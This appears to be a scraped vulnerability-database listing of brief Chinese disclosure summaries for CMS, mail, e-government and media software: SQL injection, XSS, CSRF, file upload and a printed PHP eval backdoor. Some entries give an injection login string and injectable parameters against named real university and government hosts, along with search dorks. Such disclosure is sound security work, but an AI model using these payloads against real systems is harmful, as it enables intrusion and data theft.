ShopBuilder 5.6.1 /module/activity/admin/activity.php SQL注入漏洞

No description provided by source. !/usr/bin/env python coding=utf-8 import re import urllib2 from comm import cmdline from comm import generic pocinfo = 'VulId': '1564', 'Name': 'ShopBuilder 5.6.1 /module/activity/admin/activity.php SQL注入漏洞 POC', 'AppName': 'ShopBuilder', 'AppPowerLink':...

ShopBuilder 5.6.1 /module/news/admin/newslist.php did SQL注入漏洞

No description provided by source. !/usr/bin/env python coding=utf-8 import re import urllib2 from comm import cmdline from comm import generic pocinfo = 'VulId': '1565', 'Name': 'ShopBuilder 5.6.1 /module/news/admin/newslist.php did SQL注入漏洞 POC', 'AppName': 'ShopBuilder', 'AppPowerLink':...

ShopBuilder 5.6.1 /module/news/admin/news.php SQL注入漏洞

No description provided by source. !/usr/bin/env python coding=utf-8 import re import urllib2 from comm import cmdline from comm import generic pocinfo = 'VulId': '1568', 'Name': 'ShopBuilder 5.6.1 /module/news/admin/news.php SQL注入漏洞 POC', 'AppName': 'ShopBuilder', 'AppPowerLink':...

ShopBuilder 5.6.1 /module/activity/admin_activity_product_list.php SQL注入漏洞

No description provided by source. !/usr/bin/env python coding=utf-8 import re import urllib2 from comm import cmdline from comm import generic pocinfo = 'VulId': '1563', 'Name': 'ShopBuilder 5.6.1 /module/activity/adminactivityproductlist.php SQL注入漏洞 POC', 'AppName': 'ShopBuilder', 'AppPowerLink...

大米cms 暴力getshell

简要描述： rt.最近流行路人甲。 详细说明： 看到 install\index.php 漏洞证明： 如上所述。官网就不测试了。...

ShopBuilder 5.6.1 /module/news/admin/newslist.php chk SQL注入漏洞

No description provided by source. !/usr/bin/env python coding=utf-8 import re import urllib2 from comm import cmdline from comm import generic pocinfo = 'VulId': '1569', 'Name': 'ShopBuilder 5.6.1 /module/news/admin/newslist.php chk SQL注入漏洞 POC', 'AppName': 'ShopBuilder', 'AppPowerLink':...

ShopBuilder 5.6.1 /include/ssmarty_config.php SQL注入漏洞

No description provided by source...

金蝶政务GSiS服务平台通用任意文件上传漏洞

简要描述： 参照下前人的描述：GSiS政务服务平台：首个完全根据国家政策要求全新开发的，支撑政务服务体系和行政权力监督体系融合运转的一体化平台。 存在任意文件上传漏洞，可获取webshell PS：两$$符啥感觉，给一个爽爽吧 详细说明： 程序名称：Kingdee GSIS 开发公司：金蝶 漏洞类型：任意文件上传 漏洞文件：/corehttps://images.seebug.org/upload/upload.jsp 关键词：inurl:/kdgs/ 收集几个案例，方便测试 //判断上传格式 String fileDesc; String fileExt; String...

BACnet OPC Client 1.0.24 缓冲区溢出漏洞

No description provided by source...

74cms(20141020)全局SQL注入过滤绕过

简要描述： 74cmsv3.5.120141020 绕过全局SQL注入过滤。 详细说明： WooYun: 74cms 最新版 注入8-9 报道过74cms转换编码导致的SQL注入的问题，是由于使用了iconv函数导致的，74cms做了修正，转而使用了自定义的函数utf8togbk来转换编码，代码如下： function utf8togbk$utfstr global $UC2GBTABLE; $okstr = ''; ifempty$UC2GBTABLE define'CODETABLEDIR',...

程氏舞曲CMS某泄露，导致sql注入

简要描述： 程氏舞曲CMS某泄露，导致严重问题 详细说明： 这个厂商非常给力，作为白帽子，也非常乐意～！ cookie加密后的字符泄漏。可以替换其他字段，导致SQL等，严重漏洞。 文件：C:\WWW\cscmsv3.5utf8\app\controllers\open.php //第三方登入入口 public function login ifCSAppmode==2 exit$this-CsdjSkins-Msgurl'第三方登入已经关闭！',WebPath; $urldata'logfhurl'=$SERVER'HTTPREFERER';//泄漏点...

Audiotran 1.4.1 (PLS File) Stack 缓冲区溢出漏洞

No description provided by source...

Beetel Connection Manager NetConfig.ini 缓冲区溢出漏洞

No description provided by source...

CA Antivirus Engine 8.1.637 CAB 缓冲区溢出漏洞

No description provided by source...

BlazeDVD 6.1 PLF 缓冲区溢出漏洞

No description provided by source...

CCMPlayer 1.5 m3u Playlist Stack Based 缓冲区溢出漏洞

No description provided by source...

Cain and Abel 4.9.24 RDP 缓冲区溢出漏洞

No description provided by source...

Audio Workstation 6.4.2.4.3 pls 缓冲区溢出漏洞

No description provided by source...

BS.Player 2.57 缓冲区溢出漏洞

No description provided by source...

Audiotran 1.4.2.4 PLS File Stack 缓冲区溢出漏洞

No description provided by source...

TinyRise 邮件欺诈可重置任何人密码和后台sql注射

简要描述： TinyRise 邮件欺诈可重置任何人密码和后台sql注射 详细说明： simple.php: public function forgetact $email = Filter::sqlReq::args'email'; $model = $this-model-table'user'; $obj = $model-where"email = '".$email."'"-find; if!empty$obj $model = $this-model-table'resetpassword'; $obj = $model-where"email =...

U-Mail某处sql注射漏洞

简要描述： U-Mail sql注射 U-mail 进行了文件更新其他的漏洞已经被修补了 但是还有一处没有进行修补 详细说明： oconcat.php: if ACTION == "contact-edit" $contactid = gss $GET'id' ; $grouplist = explode ",", trim $POST'grouplist' ; $groupchange = gss $POST'groupchange' ; if !$contactid && !checkpost dumpjson array "status" = 0, "message" =...

骑士CMS全局XSS过滤绕过存储型XSS前台后台指哪打哪

简要描述： 74cmsv3.5.120141020 骑士CMS全局XSS过滤绕过存储型XSS前台后台指哪打哪大部分能输入的地方都可以。 详细说明： 开篇：php里面的striptags函数剥去 HTML、XML 以及 PHP 的标签。但是并不是所有的都会被过滤。例如： 注释：%0b表示字符0x0B, 即为urldecode'%3C%0Ba%0B%3E'的值 上面的代码经过striptags后，返回字符串不过会改变。本次然过就是基于以上内容+全局过滤函数的一些BUG。 分析： 我们先来看看全局的XSS过滤函数。 function mystriptags$string $string =...

Discuz!某两个版本前台产品命令执行（无需登录）

简要描述： 最近总有人翻旧程序，我也翻一个出来！ Discuz!某版本虽然停止维护，但使用量还很可观，各大厂商或多或少都有使用。 有条件，直接存在命令执行，但目前大多默认配置直接支持。 此漏洞在互联网上公开过，但厂商不认为是漏洞？ 还是那句：没有POC,你说个jb！ 不登陆，直接执行 详细说明： 影响版本：Discuz! 6.x/7.x 全局变量防御绕过漏洞 互联网比较有人公开过，看：http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt 那时描述是：Discuz! 6.x/7.x 全局变量防御绕过漏洞 POC : 缺...

webwinmail 邮件存储型xss

简要描述： webwinmail存在有触发条件的存储型XSS 详细说明： 官方demo：http://demo.magicwinmail.com:6080/ 登陆后用户在签名处将自己签名内容设置为 设置好后使用该签名发送一封邮件给攻击对象 注意对方看下面会显示出代码，所以正文部分可以写一些很长很美好的文字迷惑对方，并强烈要求对方回复，在正文最下面会看到有xss语句，如下图： 只要对方点击回复或者转发，就可成功执行XSS代码。 最后总结下步骤： 1.自己签名插入代码 2.让对方回复或转发 3.成功执行XSS 漏洞证明： img...

齐博CMS整站系统最新版依然存在后门

简要描述： 齐博CMS整站系统最新版依然存在后门 详细说明： 齐博CMS整站系统最新版http://down.qibosoft.com/down.php?v=v7 中发现一个后门, 文件 inc\splitword.php,此文件采用多次循环base64 加密,解密之后第97行 : eval$POST'Y2hlbmdzaGlzLmMjd'; 典型的一句话木马 漏洞证明： 同上...

帝国CMS 7.0最新版CSRF漏洞2枚

简要描述： 如题 详细说明： 第一枚：CSRF增加个人信息地址 漏洞URL http://127.0.0.1/diguo7/e/ShopSys/address/AddAddress.php?enews=AddAddress 增加地址请求和功能如下 然后这个POST请求没有验证referer，导致可以利用外部poc构造form表单，进行CSRF攻击。 第二枚：CSRF删除留言 1 位置在留言板 2 删除留言的抓包请求如下，直接是个GET 3 然后由于没有token，所以可以构造CSRF删除留言。 利用URL...

齐博地方门户鸡肋文件包含造成的高危SQL注入

简要描述： 上个漏洞（http://wooyun.org/bugs/wooyun-2014-080259）忘了说，是可以直接提升为管理的，甚至不用破hash了。 这个洞无需登录可批量，看我是如何化鸡肋为无形的。第三发，齐博一直不确认，不想再放0day了。。。 ps.齐博今天挺火的啊，据说发现了后门？我能告诉你我还发现了其他后门吗。 详细说明： 和以往的故事一样，这个故事很长。有耐心看下去的朋友，且听我娓娓道来。...

TinyRise 最新版sql注入

简要描述： TinyRise 最新版sql注入 详细说明： simple.php: $ordertype = 2; else if$type=="bundbuy"//捆绑销售处理 $productids = implode',', $productid; $num = Filter::int$buynum0; $model = new Model"bundling"; $bund = $model-where"id=$id"-find; if$bund $goodsid = $bund'goodsid'; $products = $model-table"goods as...

TinyRise最新版前台任意文件包含漏洞

简要描述： TinyRise最新版20140926任意文件包含漏洞，一定条件下，可getshell 详细说明： 漏洞发生在framework/web/controller/Controllerclass.php文件的renderExecute函数： renderExecute函数存在extract变量覆盖，关键代码如下： public function renderExecute$runfile0123456789,$data0123456789 ...//省略无关代码 if$datas0123456789!==null extract$datas0123456789;...

TinyRise 最新版注射获取敏感信息

简要描述： TinyRise 最新版注射获取敏感信息 详细说明： 主要问题出在filterclass.php: public static function text$str $config = HTMLPurifierConfig::createDefault; $cachedir=Tiny::getPath'cache'."/htmlpurifier/"; if!fileexists$cachedir File::mkdir$cachedir; $config = HTMLPurifierConfig::createDefault; //配置 缓存目录...

某期刊投稿系统SQL注入漏洞之一

简要描述： 总之影响众多投稿系统。。 详细说明： 南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞，可获取数据库任意数据... 官网：http://www.025journal.com/ 演示系统： http://www.025journal.com/demo1/ http://www.025journal.com/demo2/ 客户案例：http://www.025journal.com/Web/CommonPage.aspx?Id=8 百度搜索： 投稿系统 技术支持:南京杰诺瀚软件 注入链接：/web/CommonPage.aspx 注入参数：Id...

shopNC O2O系统任意文件删除漏洞

简要描述： 齐博齐博快确认，确认了我再送个0day shopNC的任意文件删除挺多的，我拿O2O系统来说明问题吧。 详细说明： /circle/control/cut.php 46行 / 图片裁剪 / public function piccutOp import'function.thumb'; if chksubmit $thumbwidth = $POST'x'; $x1 = $POST"x1"; $y1 = $POST"y1"; $x2 = $POST"x2"; $y2 = $POST"y2"; $w = $POST"w"; $h = $POST"h"; $scale =...

cmseasy 最新版补丁绕过sql注入（绕过360waf）

简要描述： 继续绕啊绕啊 详细说明： 首先还是老地方：archiveact.php611行） function respondaction includeonce ROOT . '/lib/plugins/pay/' . front::$get'code' . '.php'; $payclassname = front::$get'code'; $payobj = new $payclassname; $uri = $SERVER"REQUESTURI"; $uriget = strstr$uri, '?'; $uriget = strreplace'?', '', $uriget;...

shop7z注入漏洞#5

简要描述： shop7z注入漏洞5 详细说明： 前台sql注入： http://www.shop7z.com/demo/showfoot.asp?cid=%2527 注入参数：cid 支持Union查询的大洞一枚 漏洞证明： http://www.shop7z.com/demo/showfoot.asp?cid=%2527 支持Union查询的大洞一枚...

ShopBuilder 5.6.1 /module/vote/admin/vote.php SQL注入漏洞

No description provided by source...

cmseasy 最新版SQLl注入（第八次绕WAF）

简要描述： 继续绕啊绕啊 详细说明： cmseasy 终于更新了 看了下对比文件，那修复无法吐槽 function LiveMessage$a global $db; $sessionid = $SESSION'sessionid'; $name = addslasheshtmlspecialchars$a'name'; $email = addslasheshtmlspecialchars$a'email'; $country = htmlspecialchars$a'country'; $phone = htmlspecialchars$a'phone'; $departmentid...

ShopBuilder 5.6.1 /module/product/admin/product_comment.php SQL注入漏洞

No description provided by source...

ShopBuilder 5.6.1 /footer.php 本地文件包含漏洞

No description provided by source...

ShopBuilder 5.6.1 /module/vote/admin/vote_list.php SQL注入漏洞

No description provided by source...

某论文授权提交系统万能密码直接进行后台（影响很大）

简要描述： 论文授权提交系统 这个影响危害性我不用多说。。 google 百度 一大推（很多案例 好多重点大学） 可对论文进行操作 危害性很大了 详细说明： google 或者百度 论文授权提交系统 可以看到很多案例 软件产家 北京方正阿帕比技术有限公司 我们提出几个案例进行证明验证 http://pss.uestc.edu.cn/tasi/admin/ 账号跟密码都为 admin' or '1'='1 就可以登录了 案例二 http://202.120.121.200/tasi/admin/ 账号名跟密码都是 admin' or '1'='1 登录了 案例三...

winmail邮件系统存储型跨站

简要描述： winmail最近刚刚升级为最新版本，但系统存在一处XSS漏洞，利用该漏洞，我们可以盗取任意用户邮件内容和COOKIE信息，以及进行一些其他恶意操作。 详细说明： 1、涉及版本：Winmail Mail Server5.5 2、winmail邮件系统对发件人字段进行了过滤，但是在回复邮件时，系统会重新读取发件人，系统重新读取后，并没有对发件人字段进行过滤，导致存储型XSS的触发。 3、系统演示站点：http://demo.magicwinmail.com:6080/ 漏洞证明： 1、登录系统--》配置箱--》使用偏好，将发件人名字改为...

Discuz 的UCenter创始人密码可被爆破（有案例）

简要描述： 没看源码，直接黑盒测试的。非验证码识别。 so 附上利用代码+几个成功案例。 详细说明： http://192.168.1.105/discuz/ucserver/admin.php 含有一个验证码 验证码的地址为 http://localhost/discuz/ucserver/admin.php?m=seccode&seccodeauth=250dIGq%2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94&7500 但是 经过测试发现 登录ucserver的时候 如果ip第一次出现那么 seccode的默认值为cccc 而 ip地址...

齐博整站/地方门户SQL注入漏洞

简要描述： 继 http://wooyun.org/bugs/wooyun-2014-079938 后第二发，依旧是直接注入非盲注，绝不鸡肋。 看看乌云的奖励怎么样，好的话还有第三发。 详细说明： 一个比较有意思的点，因为安全策略造成的注入。 就拿齐博整站系统为例。 看到/member/userinfo.php，112到114行： //过滤不健康的字 $truename=replacebadword$truename; $introduce=replacebadword$introduce; $address=replacebadword$address;...

XDcms企业管理系统POST注入一枚（demo成功）

简要描述： RT 官网:www.xdcms.cn 详细说明： 1.首先呢.我们在后台页面抓一下包。、看图如下。进行注入 index.php?m=xdcms&c=login&f=check 用SQLMAP注入的时候必须要代理着Burp,否则的话验证码会过期。会导致注入失败。 测试官网的Demo复现成功。 2.我们看看表。 OK, 漏洞证明： 现在均为复现。...

骑士人才系统 7处越权+2处sql

简要描述： 骑士人才系统 7处越权+1处sql 详细说明： wapuser.php: 一下越权都是没有uid的参与，导致任意修改数据库任何记录 第一处: elseif$act == "resumeworkdel" //越权 $smarty-cache = false; $id=intval$GET'workid'; $sql="delete from ".table"resumework"." where id=$id"; if$db-query$sql exit"ok"; // WapShowMsg"删除工作经验成功",1; else exit"err"; //...

骑士人才系统 2处越权+1处sql注入获取敏感信息

简要描述： 骑士人才系统 2处越权+1处sql注入获取敏感信息 详细说明： 这里我就不做代码分析了，直接看我操作 第一步，我们首先注册一个正常的企业用户 第二步，我们修改企业用户的信息 公司名称',jobsname=user -- sdd 然后我们访问url： POST /74cmsv3.5.120141015https://images.seebug.org/upload/wap/company/wapcompanyjobs.php?act=jobseditsave HTTP/1.1 Host: localhost postdata:...

XDcms订餐系统存在设计缺陷导致遍历订餐数据（官方demo成功）

简要描述： RT 详细说明： 由于demo复现成功,我也就不怎么演示了。 demo地址：http://dd.xdcms.cn 1.首先我们注册一个账号然后下订单。看图如下。 2.以上的图,我们注意看连接：http://dd.xdcms.cn/index.php?m=member&c=order&f=ordershow&id=109 注意一下id=这里参数。，我们改成99-100看看是什么 OK,可以任意查看订单。 漏洞证明： Demo可以复现。...

74cms 最新版sql注入漏洞

简要描述： rt 详细说明： 今天之前找了个 刚下下来一会你们就发布新的 WooYun: 74cms SQL注入漏洞 但是最新版 的那个注入跟我发的那个一样的 漏洞文件;wap/company/wapcompanycollectreusme.php 67-85行 elseif$act=="ajaxcollectresumeadd" $resumeid=$POST"resumeid"; $sql="select from ".table"companyfavorites"." where resumeid=$resumeid and companyuid=$SESSIONuid ";...

某通用政务大厅系统SQL注射漏洞

简要描述： 某通用政务大厅系统SQL注射漏洞 详细说明： google关键词 inurl:permissionitemlistSort.jspx?sortcode= 技术支持：深圳太极软件有限公司 存在注入漏洞，影响多个地方的政务大厅 如下，测试后均存在漏洞 存在漏洞的参数是sortcode参数 http://www.kfxzzx.gov.cn/permissionitemlistSort.jspx?sortcode=003003&areaid=410203...